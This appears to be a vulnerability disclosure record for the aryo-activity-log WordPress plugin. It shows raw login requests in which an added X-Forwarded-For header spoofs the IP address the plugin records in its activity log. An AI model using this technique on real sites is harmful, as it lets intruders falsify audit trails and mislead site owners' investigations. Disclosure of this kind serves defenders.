Title | Http Header Injection in aryo-activity-log |
---|
Description | http header injection vulnerability in aryo-activity-log wordpress plugin that could be manipulate request ip with add x-forwarded-for
1. install aryo-activity-log wordpress plugin
https://wordpress.org/plugins/aryo-activity-log/
2. create login request like that
POST /wp-login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wp-login.php?loggedout=true&wp_lang=en_US
Content-Type: application/x-www-form-urlencoded
Content-Length: 103
Origin: http://localhost
Connection: close
Cookie: njt-fs-filemanager-settings-tab_last_tab=1; wordpress_test_cookie=WP%20Cookie%20check; PHPSESSID=d75f7938aa9b661bd79ac1844d216f59; wp_lang=en_US; ucp_tabs=2; _ga=GA1.1.1550157811.1667294040
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
log=admin&pwd=adminadmin&wp-submit=Log+In&redirect_to=http%3A%2F%2Flocalhost%2Fwp-admin%2F&testcookie=1
3. add X-Forwarded-For for ip spoofind in activity log
POST /wp-login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wp-login.php?loggedout=true&wp_lang=en_US
Content-Type: application/x-www-form-urlencoded
Content-Length: 103
Origin: http://localhost
X-Forwarded-For: 1.1.1.1
Connection: close
Cookie: njt-fs-filemanager-settings-tab_last_tab=1; wordpress_test_cookie=WP%20Cookie%20check; PHPSESSID=d75f7938aa9b661bd79ac1844d216f59; wp_lang=en_US; ucp_tabs=2; _ga=GA1.1.1550157811.1667294040
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
log=admin&pwd=adminadmin&wp-submit=Log+In&redirect_to=http%3A%2F%2Flocalhost%2Fwp-admin%2F&testcookie=1
4. navigate to activity log
POC:
https://drive.google.com/file/d/1x-pgK3_-uS7NWfkEt_tk4Wc9FhXk-pYX/view?usp=sharing
https://drive.google.com/file/d/1YNOLomPC95rRvtk0topUhStVIa7Y8lcq/view?usp=sharing
|
---|
User | rezaduty (ID 10530) |
---|
Submission | 03/11/2022 11:46 (2 years ago) |
---|
Moderation | 11/11/2022 08:06 (8 days later) |
---|
Status | Accepterad |
---|
VulDB Entry | 213448 |
---|